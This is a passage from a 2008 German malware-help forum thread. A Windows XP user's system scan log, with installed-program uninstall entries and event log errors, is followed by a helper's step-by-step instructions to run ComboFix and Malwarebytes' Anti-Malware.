Sicherheitsupdate für Windows XP (KB931261) --> "C:\WINDOWS\$NtUninstallKB931261$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB931784) --> "C:\WINDOWS\$NtUninstallKB931784$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB932168) --> "C:\WINDOWS\$NtUninstallKB932168$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB933729) --> "C:\WINDOWS\$NtUninstallKB933729$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB935839) --> "C:\WINDOWS\$NtUninstallKB935839$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB935840) --> "C:\WINDOWS\$NtUninstallKB935840$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB936021) --> "C:\WINDOWS\$NtUninstallKB936021$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB937894) --> "C:\WINDOWS\$NtUninstallKB937894$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB938127) --> "C:\WINDOWS\$NtUninstallKB938127$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB941202) --> "C:\WINDOWS\$NtUninstallKB941202$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB941568) --> "C:\WINDOWS\$NtUninstallKB941568$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB941569) --> "C:\WINDOWS\$NtUninstallKB941569$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB941644) --> "C:\WINDOWS\$NtUninstallKB941644$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB941693) --> "C:\WINDOWS\$NtUninstallKB941693$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB943055) --> "C:\WINDOWS\$NtUninstallKB943055$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB943460) --> "C:\WINDOWS\$NtUninstallKB943460$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB943485) --> "C:\WINDOWS\$NtUninstallKB943485$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB944338) --> "C:\WINDOWS\$NtUninstallKB944338$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB944653) --> "C:\WINDOWS\$NtUninstallKB944653$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB945553) --> "C:\WINDOWS\$NtUninstallKB945553$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB946026) --> "C:\WINDOWS\$NtUninstallKB946026$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB947864) --> "C:\WINDOWS\$NtUninstallKB947864$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB948590) --> "C:\WINDOWS\$NtUninstallKB948590$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB948881) --> "C:\WINDOWS\$NtUninstallKB948881$\spuninst\spuninst.exe"
Sicherheitsupdate für Windows XP (KB950749) --> "C:\WINDOWS\$NtUninstallKB950749$\spuninst\spuninst.exe"
Sony Ericsson PC Suite --> MsiExec.exe /I{26B5D684-75D6-44B9-BBFF-D4100F43092A}
Spybot - Search & Destroy 1.4 --> "C:\Programme\Spybot - Search & Destroy\unins000.exe"
Testbuch Bewerbung --> C:\WINDOWS\IsUn0407.exe -fC:\Programme\Haufe\TBBewerbung\TBBewerbung.isu
TextPad 4.7 --> MsiExec.exe /X{B510A987-487E-4C66-9F4F-D386AC275715}
Update für Windows XP (KB894391) --> "C:\WINDOWS\$NtUninstallKB894391$\spuninst\spuninst.exe"
Update für Windows XP (KB898461) --> "C:\WINDOWS\$NtUninstallKB898461$\spuninst\spuninst.exe"
Update für Windows XP (KB900485) --> "C:\WINDOWS\$NtUninstallKB900485$\spuninst\spuninst.exe"
Update für Windows XP (KB904942) --> "C:\WINDOWS\$NtUninstallKB904942$\spuninst\spuninst.exe"
Update für Windows XP (KB908531) --> "C:\WINDOWS\$NtUninstallKB908531$\spuninst\spuninst.exe"
Update für Windows XP (KB910437) --> "C:\WINDOWS\$NtUninstallKB910437$\spuninst\spuninst.exe"
Update für Windows XP (KB911280) --> "C:\WINDOWS\$NtUninstallKB911280$\spuninst\spuninst.exe"
Update für Windows XP (KB916595) --> "C:\WINDOWS\$NtUninstallKB916595$\spuninst\spuninst.exe"
Update für Windows XP (KB920342) --> "C:\WINDOWS\$NtUninstallKB920342$\spuninst\spuninst.exe"
Update für Windows XP (KB920872) --> "C:\WINDOWS\$NtUninstallKB920872$\spuninst\spuninst.exe"
Update für Windows XP (KB922582) --> "C:\WINDOWS\$NtUninstallKB922582$\spuninst\spuninst.exe"
Update für Windows XP (KB927891) --> "C:\WINDOWS\$NtUninstallKB927891$\spuninst\spuninst.exe"
Update für Windows XP (KB930916) --> "C:\WINDOWS\$NtUninstallKB930916$\spuninst\spuninst.exe"
Update für Windows XP (KB936357) --> "C:\WINDOWS\$NtUninstallKB936357$\spuninst\spuninst.exe"
Update für Windows XP (KB938828) --> "C:\WINDOWS\$NtUninstallKB938828$\spuninst\spuninst.exe"
Update für Windows XP (KB942763) --> "C:\WINDOWS\$NtUninstallKB942763$\spuninst\spuninst.exe"
VNC Free Edition 4.1.1 --> "C:\Programme\RealVNC\VNC4\unins000.exe"
Winamp (remove only) --> "C:\Programme\Winamp\UninstWA.exe"
Windows XP-Hotfix - KB873339 --> C:\WINDOWS\$NtUninstallKB873339$\spuninst\spuninst.exe
Windows XP-Hotfix - KB885835 --> C:\WINDOWS\$NtUninstallKB885835$\spuninst\spuninst.exe
Windows XP-Hotfix - KB885836 --> C:\WINDOWS\$NtUninstallKB885836$\spuninst\spuninst.exe
Windows XP-Hotfix - KB885884 --> C:\WINDOWS\$NtUninstallKB885884$\spuninst\spuninst.exe
Windows XP-Hotfix - KB886185 --> C:\WINDOWS\$NtUninstallKB886185$\spuninst\spuninst.exe
Windows XP-Hotfix - KB887472 --> C:\WINDOWS\$NtUninstallKB887472$\spuninst\spuninst.exe
Windows XP-Hotfix - KB888302 --> C:\WINDOWS\$NtUninstallKB888302$\spuninst\spuninst.exe
Windows XP-Hotfix - KB890859 --> "C:\WINDOWS\$NtUninstallKB890859$\spuninst\spuninst.exe"
Windows XP-Hotfix - KB891781 --> C:\WINDOWS\$NtUninstallKB891781$\spuninst\spuninst.exe
WinRAR Archivierer --> C:\Programme\WinRAR\uninstall.exe


-- Application Event Log -------------------------------------------------------

Event Record #/Type1958 / Error
Event Submitted/Written: 05/23/2008 04:46:09 PM
Event ID/Source: 1 / WinVNC4
Event Description:
SocketManager: unknown listener event: 0

Event Record #/Type1953 / Error
Event Submitted/Written: 05/23/2008 03:03:08 PM
Event ID/Source: 1000 / Microsoft Office 10
Event Description:
Faulting application winword.exe, version 10.0.2627.0, faulting module winword.exe, version 10.0.2627.0, fault address 0x0001b53f.

Event Record #/Type1952 / Error
Event Submitted/Written: 05/23/2008 02:45:01 PM
Event ID/Source: 1000 / Application Error
Event Description:
Fehlgeschlagene Anwendung dss.exe, Version 3.2.8.1, fehlgeschlagenes Modul ntdll.dll, Version 5.1.2600.2180, Fehleradresse 0x0001142e.
Das medienspezifische Ereignis für [dss.exe!ws!] wird verarbeitet.

Event Record #/Type1951 / Error
Event Submitted/Written: 05/23/2008 02:43:10 PM
Event ID/Source: 1001 / Application Error
Event Description:
Fehlerhafter Speicherbereich 561099094.
Nach der 802.1x-Authentifizierung resultierte der WEP-Schlüsselaustausch nicht in einer sicheren Verbindung. Die aktuelle Einstellung wurde als fehlerhaft markiert, und die Drahtlosverbindung wird getrennt.

Event Record #/Type1950 / Error
Event Submitted/Written: 05/23/2008 02:42:58 PM
Event ID/Source: 1000 / Application Error
Event Description:
Fehlgeschlagene Anwendung dss.exe, Version 3.2.8.1, fehlgeschlagenes Modul ntdll.dll, Version 5.1.2600.2180, Fehleradresse 0x0001142e.
Das medienspezifische Ereignis für [dss.exe!ws!] wird verarbeitet.



-- Security Event Log ----------------------------------------------------------

No Errors/Warnings found.


-- System Event Log ------------------------------------------------------------

Event Record #/Type5693 / Warning
Event Submitted/Written: 05/24/2008 04:01:05 PM
Event ID/Source: 1007 / Dhcp
Event Description:
Die IP-Adresse für die Netzwerkkarte mit der Netzwerkadresse 006097D832DF
wurde automatisch durch diesen Computer konfiguriert. Die verwendete IP-Adresse ist 169.254.185.242.

Event Record #/Type5692 / Error
Event Submitted/Written: 05/24/2008 03:59:58 PM / 05/24/2008 04:00:31 PM
Event ID/Source: 19468 / ati2mtag
Event Description:
CPLIB :: General - Invalid Parameter

Event Record #/Type5684 / Warning
Event Submitted/Written: 05/24/2008 10:28:02 AM
Event ID/Source: 1007 / Dhcp
Event Description:
Die IP-Adresse für die Netzwerkkarte mit der Netzwerkadresse 006097D832DF
wurde automatisch durch diesen Computer konfiguriert. Die verwendete IP-Adresse ist 169.254.185.242.

Event Record #/Type5669 / Error
Event Submitted/Written: 05/24/2008 10:25:31 AM / 05/24/2008 10:26:03 AM
Event ID/Source: 19468 / ati2mtag
Event Description:
CPLIB :: General - Invalid Parameter

Event Record #/Type5645 / Warning
Event Submitted/Written: 05/23/2008 10:30:14 PM
Event ID/Source: 1007 / Dhcp
Event Description:
Die IP-Adresse für die Netzwerkkarte mit der Netzwerkadresse 006097D832DF
wurde automatisch durch diesen Computer konfiguriert. Die verwendete IP-Adresse ist 169.254.185.242.



-- End of Deckard's System Scanner: finished at 2008-05-24 20:19:00 ------------

Alt 24.05.2008, 20:46   #12
markusg
/// Malware-holic
 
Ist das ein Virus? - Standard

Ist das ein Virus?



ist ok so ;-)
hiemmit gehts weiter:
installiere nun zuerst das ComboFix, bevor wir weitere Arbeiten an deinem System vornehmen. Folge dieser Anleitung, waehle die deutsche Übersetzung: Combofix Guide & Instructions, um dich dort über die Anleitung zum Combofix zu informieren, insbesondere über die Installation der Wiederherstellungs Konsole. Installiere die Wiederherstellungskonsole zuerst.

Poste anschliessend ein ComboFix Logfile und ein neues HijackThis Log.

Hinweis: klicke nicht in das Fenster vom ComboFix, während es läuft, das könnte das Programm veranlassen hängen zu bleiben.
Hinweis: das ComboFix kann einige Einstellungen des Internet Explorers zurücksetzen und ihn zu deinem Haupt-Browser machen.
Hinweis: das ComboFix verhindert das starten von CDs, Floppies, USB Geräten, um die Malware Entfernung zu unterstützen und die Sicherheit zu erhöhen.

Alt 24.05.2008, 21:03   #13
CandyDarling
 
Ist das ein Virus? - Icon32

Ist das ein Virus?



Hey Markus, ich glaube das dauert eine Weile bis ich die Anleitung von ComboFix gelesen habe und verstehe. Hab natürlich keine Windows CD mehr, weiss nicht welches Service Pack ich heruntergeladen habe usw. Kann dabei auch was schief gehen, wenn ja was?

Alt 24.05.2008, 21:06   #14
markusg
/// Malware-holic
 
Ist das ein Virus? - Standard

Ist das ein Virus?



schief gehen kann teoretisch immer was. instaliere das mit rettungskonsole.
bitte evtl. wenn du schafst ncoh das
* Lade Malwarebytes' Anti-Malware auf deinen Desktop herunter.
Malwarebytes.org - 10k -
* Mache einen Doppel-Klick auf die mbam-setup.exe und folge den Hinweisen, um das Programm zu installieren.
* Vergewissere dich nun, dass folgende Optionen angehakt sind:

o Malwarebytes' Anti-Malware updaten
o Malwarebytes' Anti-Malware starten

* Klicke nun auf Fertigstellen.
* Wenn ein Update gefunden wird, wird es heruntergeladen und die neueste Version installieren.
* Wenn das Programm fertig geladen ist, wähle kompletScan durchführen, klicke auf Scan.
* Wenn der Scan beendet ist, klicke auf OK, dann auf Ergebnisse anzeigen.
* Vergewissere dich, dass neben allen Malware-Einträgen ein Häkchen sitzt.
* Klicke dann auf 'Ausgewähltes entfernen' und auf OK.

geh jetzt off

Alt 24.05.2008, 21:10   #15
CandyDarling
 
Ist das ein Virus? - Standard

Ist das ein Virus?



Vielen Dank erst mal und noch einen schönen Abend! Ich hab ja nichts so Schönes vor mir...

Antwort

Themen zu Ist das ein Virus?
antivir, avira, avira antivir, dateien, einstellungen, folge, forum, frage, fragen, ftp, internet, ist das ein virus?, kaspersky, neues, nichts, online, personal, problem, programm, ratlos, scan, scanner, system, virus, virus?





Zum Thema Ist das ein Virus? - Ich oute mich vorneweg als völlig Ahnungslose und vertraue ganz darauf, dass hier allwissende, hilfreiche Fachleute versammelt sind, die mir weiterhelfen können. Zu meinem Problem: Als ich heute Morgen meinen - Ist das ein Virus?...
Archiv
Du betrachtest: Ist das ein Virus? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.